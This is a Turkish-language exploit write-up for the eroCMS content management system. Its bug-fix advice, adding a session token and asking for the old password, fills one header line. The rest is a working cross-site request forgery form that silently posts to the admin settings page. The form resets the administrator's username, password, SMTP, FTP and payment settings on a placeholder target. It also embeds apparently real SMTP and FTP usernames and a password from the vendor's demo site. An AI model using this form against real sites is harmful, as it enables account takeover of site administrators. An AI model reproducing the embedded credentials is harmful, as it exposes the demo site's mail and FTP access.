< ------------------- header data start ------------------- >


#############################################################


# Application Name : eroCMS


# vulnerable Type : xsrf


# Infection : Uzaktan otomatik olarak user bilgileri degistirebilinir.


# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.


# author : http://demo.erocms.net/admin/index.php?site=settings


#############################################################


< ------------------- header data end of ------------------- >


< -- bug code start -- >


<form name=formular action=http://hedefsite.com/SCRIPTYOLU/admin/index.php?site=settings method=post enctype=multipart/form-data>
<input type=hidden name=username value=KULLANICIADI size=60 />
<input type=hidden name=password value=SIFRENIZ size=60 />
<input type=hidden name=wartung size=60 />
<input type=hidden name=wartung_headline value=W size=60 />
<input type=hidden name=wartung_text value=bild und video bearbeitung size=60 />
<input type=hidden name=amateur_name value=geile Pussy size=60 />
<input type=hidden name=reset_pn />
<textarea style=width:1px; height:1px name=welcome_pn>test seite </hiddenarea>
<input type=hidden name=email_bei_pn checked=checked size=60 />
<input type=hidden name=email value=[email protected] size=60 />
<input type=hidden name=absender value=eroCMS size=60 />
<input type=hidden name=smtp_host value=mail.erocms.net size=60 />
<input type=hidden name=smtp_user value=web1p1 size=60 />
<input type=hidden name=smtp_pass value=Nordin81 size=60 />
<input type=hidden name=smtp_auth checked=checked size=60 />
<input type=hidden name=ftp_host value=demo.erocms.net size=60 />
<input type=hidden name=ftp_port value= size=60 />
<input type=hidden name=ftp_user value=web1 size=60 />
<input type=hidden name=ftp_pass value=Nordin81 size=60 />
<input type=hidden name=ftp_path value=/html/demo/upload/temp size=60 />
<input type=hidden name=is_sue checked=checked size=60 />
<input type=hidden name=sue_kundenid value=0 size=60 />
<input type=hidden name=sue_projektid value=0 size=60 />
<input type=hidden name=sue_pass value=localhost size=60 />
<input type=hidden name=sue_bonus_10 value=0 size=60 />
<input type=hidden name=sue_bonus_25 value=3 size=60 />
<input type=hidden name=sue_bonus_50 value=6 size=60 />
<input type=hidden name=sue_bonus_100 value=10 size=60 />
<input type=hidden name=sue_bonus_150 value=15 size=60 />
<input type=hidden name=sue_bonus_200 value=20 size=60 />
<input type=hidden name=is_sl checked=checked size=60 />
<input type=hidden name=sl_projektid value=78410 size=60 />
<input type=hidden name=sl_pass value=Nordin81 size=60 />
<input type=hidden name=sl_bonus_10 value=10 size=60 />
<input type=hidden name=sl_bonus_25 value=25 size=60 />
<input type=hidden name=sl_bonus_50 value=50 size=60 />
<input type=hidden name=sl_bonus_100 value=100 size=60 />
<input type=hidden name=sl_bonus_150 value=150 size=60 />
<input type=hidden name=sl_bonus_200 value=200 size=60 />
<input type=hidden name=is_netdebit checked=checked size=60 />
<input type=hidden name=is_netdebit_testmodus size=60 />
<input type=hidden name=netdebit_partner_id value=0 size=60 />
<input type=hidden name=netdebit_content_id value=0 size=60 />
<input type=hidden name=netdebit_webmaster_id value=0 size=60 />
<input type=hidden name=is_cab checked=checked size=60 />
<input type=hidden name=cab_id value=0 size=60 />
<input type=hidden name=cab_link value= size=60 />
<input type=hidden name=adress_daten size=60 />
<input type=hidden name=coins value=0 size=60 />
<input type=hidden name=bilderrotation checked=checked size=60 />
<input type=hidden name=videothek_on_off checked=checked size=60 />
<input type=hidden name=vorschaltseite size=60 />
<input type=hidden name=ueber18 size=60 />
<input type=hidden name=is_impress size=60 />
<input type=hidden name=header_onoff checked=checked size=60 />
<input type=hidden name=regmail checked=checked size=60 />
<input type=hidden name=friends checked=checked size=60 />
<select name=templates size=1><option value=candyallover >candyallover</option></select>
<input type=hidden name=url value=demo.erocms.net size=60 />
<textarea style=width:500px; height:150px; name=meta_header cols=5 rows=5></textarea>
<input type=hidden name=title value=eroCMS size=60 />
<input type=hidden name=keywords value=eroCMS, size=60 />
<input type=hidden name=description value=eroCMS size=60 />
<input type=submit name=submit_settings value=BUTONADI />
</form>


< -- bug code end of -- >